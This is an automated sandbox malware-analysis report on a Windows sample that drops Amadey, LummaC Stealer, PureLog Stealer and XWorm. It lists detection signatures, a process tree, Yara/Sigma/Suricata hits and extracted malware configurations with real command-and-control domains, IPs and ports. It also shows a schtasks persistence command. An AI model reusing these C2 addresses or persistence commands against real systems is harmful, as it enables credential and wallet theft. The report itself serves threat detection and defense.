Edit tour

Windows Analysis Report
S2W2ftXM2b.exe

Overview

General Information

Sample name:	S2W2ftXM2b.exe renamed because original name is a hash value
Original sample name:	ec4e01d7791c36b423656cffe6b64973.exe
Analysis ID:	1628948
MD5:	ec4e01d7791c36b423656cffe6b64973
SHA1:	19c653337b0b1efffa4f3fc5bc10220b2276e212
SHA256:	37ed815b936087889df2431acf87e6a85cee52ee5c876ac5f2df34ae5a64282c
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Drops PE files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

S2W2ftXM2b.exe (PID: 5104 cmdline: "C:\Users\user\Desktop\S2W2ftXM2b.exe" MD5: EC4E01D7791C36B423656CFFE6B64973)

1s89v4.exe (PID: 2620 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe MD5: A92D6465D69430B38CBC16BF1C6A7210)

rapes.exe (PID: 6880 cmdline: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: A92D6465D69430B38CBC16BF1C6A7210)

2X0520.exe (PID: 6340 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\2X0520.exe MD5: 1E71F9A7F21FB7AB1E9B5DF304FDBBC8)

KI2Q1PIQVVVTNGJPW8.exe (PID: 3088 cmdline: "C:\Users\user~1\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe" MD5: FBD20CABACEE9B0DEF4EA7C0C7340405)

rapes.exe (PID: 316 cmdline: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: A92D6465D69430B38CBC16BF1C6A7210)

rundll32.exe (PID: 4036 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

rapes.exe (PID: 2908 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: A92D6465D69430B38CBC16BF1C6A7210)

JqGBbm7.exe (PID: 6448 cmdline: "C:\Users\user~1\AppData\Local\Temp\10062780101\JqGBbm7.exe" MD5: 30C1A6337089E68B975438CAEBC8F497)

3Mv6i65.exe (PID: 1408 cmdline: "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe" MD5: 360E9AA39065352478DA372C3C3B9B43)

3Mv6i65.exe (PID: 4548 cmdline: "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe" MD5: 360E9AA39065352478DA372C3C3B9B43)

khykuQw.exe (PID: 7116 cmdline: "C:\Users\user~1\AppData\Local\Temp\10074170101\khykuQw.exe" MD5: ACCDBD5044408C82C19C977829713E4F)

zY9sqWs.exe (PID: 988 cmdline: "C:\Users\user~1\AppData\Local\Temp\10075800101\zY9sqWs.exe" MD5: 2BB133C52B30E2B6B3608FDC5E7D7A22)

bPDDW9F.exe (PID: 2196 cmdline: "C:\Users\user~1\AppData\Local\Temp\10077160101\bPDDW9F.exe" MD5: CDE0F4BF8C4605529175BBB5E86C6BAD)

d0HNrLB.exe (PID: 1848 cmdline: "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe" MD5: D1458DC39B290683CEFBB01CC5B0991A)

d0HNrLB.exe (PID: 1268 cmdline: "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe" MD5: D1458DC39B290683CEFBB01CC5B0991A)

schtasks.exe (PID: 5832 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 6764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)

d0HNrLB.exe (PID: 4052 cmdline: C:\Users\user\AppData\Roaming\d0HNrLB.exe MD5: D1458DC39B290683CEFBB01CC5B0991A)

d0HNrLB.exe (PID: 4664 cmdline: "C:\Users\user\AppData\Roaming\d0HNrLB.exe" MD5: D1458DC39B290683CEFBB01CC5B0991A)

WerFault.exe (PID: 4840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: LummaC

{"C2 url": ["circujitstorm.bet", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "PsFKDg--pablo"}

Threatname: Xworm

{"C2 url": ["178.250.188.144"], "Port": 22635, "Aes key": "<123456789>", "SPL": "<Violet>", "Install file": "USB.exe"}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\d0HNrLB[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000016.00000003.2366762496.0000000003270000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.2463770146.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1396029487.0000000001192000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000017.00000002.2534632505.000000000058A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000008.00000003.1375749283.0000000001190000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1385427683.000000000119A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.2514951557.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000016.00000003.2367847779.000000000327A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000003.2367332906.0000000003271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1395821864.0000000001192000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1361884238.0000000001192000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000008.00000003.1359925992.0000000001190000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000013.00000003.2318496725.000000000137E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.1538310324.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Process Memory Space: 2X0520.exe PID: 6340	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 2X0520.exe PID: 6340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2X0520.exe PID: 6340	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 6448	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 6448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JqGBbm7.exe PID: 6448	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: khykuQw.exe PID: 7116	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: khykuQw.exe PID: 7116	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: khykuQw.exe PID: 7116	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: d0HNrLB.exe PID: 4052	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: d0HNrLB.exe PID: 4664	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
33.2.d0HNrLB.exe.34f9550.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
22.2.khykuQw.exe.e60000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.2.zY9sqWs.exe.a20000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
33.2.d0HNrLB.exe.353e970.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
33.2.d0HNrLB.exe.353e970.0.raw.unpack	rat_win_xworm_v2	Finds XWorm v2 samples based on characteristic strings	Sekoia.io	0x7727:$str02: ngrok 0x15abb:$str02: ngrok 0x15b15:$str02: ngrok 0x740d:$str03: Mutexx 0x15c7f:$str04: FileManagerSplitFileManagerSplit 0x15ae1:$str05: InstallngC 0x156a5:$str06: downloadedfile 0x1559d:$str11: txtttt 0x164db:$str12: \root\SecurityCenter2 0x15d05:$str13: [USB] 0x15ceb:$str14: [Drive] 0x15c6d:$str15: [Folder] 0x16507:$str19: Select * from AntivirusProduct 0x151b1:$str21: RunBotKiller
14.2.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.2.1s89v4.exe.f70000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
25.0.d0HNrLB.exe.510000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.0.1s89v4.exe.f70000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
6.0.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
15.0.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
34.2.d0HNrLB.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
34.2.d0HNrLB.exe.400000.0.unpack	rat_win_xworm_v2	Finds XWorm v2 samples based on characteristic strings	Sekoia.io	0x7727:$str02: ngrok 0x15abb:$str02: ngrok 0x15b15:$str02: ngrok 0x740d:$str03: Mutexx 0x15c7f:$str04: FileManagerSplitFileManagerSplit 0x15ae1:$str05: InstallngC 0x156a5:$str06: downloadedfile 0x1559d:$str11: txtttt 0x164db:$str12: \root\SecurityCenter2 0x15d05:$str13: [USB] 0x15ceb:$str14: [Drive] 0x15c6d:$str15: [Folder] 0x16507:$str19: Select * from AntivirusProduct 0x151b1:$str21: RunBotKiller
14.0.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
23.0.zY9sqWs.exe.a20000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
33.2.d0HNrLB.exe.353e970.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
33.2.d0HNrLB.exe.353e970.0.unpack	rat_win_xworm_v2	Finds XWorm v2 samples based on characteristic strings	Sekoia.io	0x5927:$str02: ngrok 0x13cbb:$str02: ngrok 0x13d15:$str02: ngrok 0x560d:$str03: Mutexx 0x13e7f:$str04: FileManagerSplitFileManagerSplit 0x13ce1:$str05: InstallngC 0x138a5:$str06: downloadedfile 0x1379d:$str11: txtttt 0x146db:$str12: \root\SecurityCenter2 0x13f05:$str13: [USB] 0x13eeb:$str14: [Drive] 0x13e6d:$str15: [Folder] 0x14707:$str19: Select * from AntivirusProduct 0x133b1:$str21: RunBotKiller
6.2.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
15.2.rapes.exe.470000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
8.2.2X0520.exe.820000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\d0HNrLB.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe, ProcessId: 1268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0HNrLB

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe, ProcessId: 1268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe", ParentImage: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe, ParentProcessId: 1268, ParentProcessName: d0HNrLB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe", ProcessId: 5832, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, ParentCommandLine: "C:\Users\user\Desktop\S2W2ftXM2b.exe", ParentImage: C:\Users\user\Desktop\S2W2ftXM2b.exe, ParentProcessId: 5104, ParentProcessName: S2W2ftXM2b.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, ProcessId: 2620, ProcessName: 1s89v4.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\S2W2ftXM2b.exe, ProcessId: 5104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:27.759731+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	188.114.97.3	443	TCP
2025-03-04T09:56:28.497815+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	188.114.97.3	443	TCP
2025-03-04T09:56:31.042939+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	188.114.97.3	443	TCP
2025-03-04T09:56:32.672194+0100	2028371	3	Unknown Traffic	192.168.2.7	49704	188.114.97.3	443	TCP
2025-03-04T09:56:34.006451+0100	2028371	3	Unknown Traffic	192.168.2.7	49715	188.114.97.3	443	TCP
2025-03-04T09:56:36.349856+0100	2028371	3	Unknown Traffic	192.168.2.7	49731	188.114.97.3	443	TCP
2025-03-04T09:56:37.902577+0100	2028371	3	Unknown Traffic	192.168.2.7	49742	188.114.97.3	443	TCP
2025-03-04T09:56:46.199709+0100	2028371	3	Unknown Traffic	192.168.2.7	49792	188.114.97.3	443	TCP
2025-03-04T09:57:38.462714+0100	2028371	3	Unknown Traffic	192.168.2.7	49981	188.114.96.3	443	TCP
2025-03-04T09:57:39.644314+0100	2028371	3	Unknown Traffic	192.168.2.7	49983	188.114.96.3	443	TCP
2025-03-04T09:57:45.070855+0100	2028371	3	Unknown Traffic	192.168.2.7	49985	188.114.96.3	443	TCP
2025-03-04T09:57:46.402437+0100	2028371	3	Unknown Traffic	192.168.2.7	49986	188.114.96.3	443	TCP
2025-03-04T09:58:03.153528+0100	2028371	3	Unknown Traffic	192.168.2.7	49990	149.154.167.99	443	TCP
2025-03-04T09:58:04.001279+0100	2028371	3	Unknown Traffic	192.168.2.7	49991	104.21.67.123	443	TCP
2025-03-04T09:58:04.659795+0100	2028371	3	Unknown Traffic	192.168.2.7	49993	104.21.67.123	443	TCP
2025-03-04T09:58:07.354496+0100	2028371	3	Unknown Traffic	192.168.2.7	49994	188.114.96.3	443	TCP
2025-03-04T09:58:09.705308+0100	2028371	3	Unknown Traffic	192.168.2.7	49996	188.114.96.3	443	TCP
2025-03-04T09:58:09.741111+0100	2028371	3	Unknown Traffic	192.168.2.7	49997	104.21.67.123	443	TCP
2025-03-04T09:58:10.887743+0100	2028371	3	Unknown Traffic	192.168.2.7	49999	104.21.67.123	443	TCP
2025-03-04T09:58:12.944828+0100	2028371	3	Unknown Traffic	192.168.2.7	50000	104.21.67.123	443	TCP
2025-03-04T09:58:13.319498+0100	2028371	3	Unknown Traffic	192.168.2.7	50002	188.114.96.3	443	TCP
2025-03-04T09:58:14.534790+0100	2028371	3	Unknown Traffic	192.168.2.7	50003	104.21.67.123	443	TCP
2025-03-04T09:58:16.469872+0100	2028371	3	Unknown Traffic	192.168.2.7	50005	188.114.96.3	443	TCP
2025-03-04T09:58:23.499568+0100	2028371	3	Unknown Traffic	192.168.2.7	50011	104.21.67.123	443	TCP
2025-03-04T09:58:27.950433+0100	2028371	3	Unknown Traffic	192.168.2.7	50014	104.21.67.123	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:27.927861+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49700	188.114.97.3	443	TCP
2025-03-04T09:56:30.282978+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49701	188.114.97.3	443	TCP
2025-03-04T09:56:46.656776+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49792	188.114.97.3	443	TCP
2025-03-04T09:57:39.144786+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49981	188.114.96.3	443	TCP
2025-03-04T09:57:44.186133+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49983	188.114.96.3	443	TCP
2025-03-04T09:58:04.119694+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49991	104.21.67.123	443	TCP
2025-03-04T09:58:08.245304+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49993	104.21.67.123	443	TCP
2025-03-04T09:58:16.952730+0100	2054653	1	A Network Trojan was detected	192.168.2.7	50005	188.114.96.3	443	TCP
2025-03-04T09:58:28.498091+0100	2054653	1	A Network Trojan was detected	192.168.2.7	50014	104.21.67.123	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:27.927861+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49700	188.114.97.3	443	TCP
2025-03-04T09:57:39.144786+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49981	188.114.96.3	443	TCP
2025-03-04T09:58:04.119694+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49991	104.21.67.123	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:27.759731+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49700	188.114.97.3	443	TCP
2025-03-04T09:56:28.497815+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49701	188.114.97.3	443	TCP
2025-03-04T09:56:31.042939+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49702	188.114.97.3	443	TCP
2025-03-04T09:56:32.672194+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49704	188.114.97.3	443	TCP
2025-03-04T09:56:34.006451+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49715	188.114.97.3	443	TCP
2025-03-04T09:56:36.349856+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49731	188.114.97.3	443	TCP
2025-03-04T09:56:37.902577+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49742	188.114.97.3	443	TCP
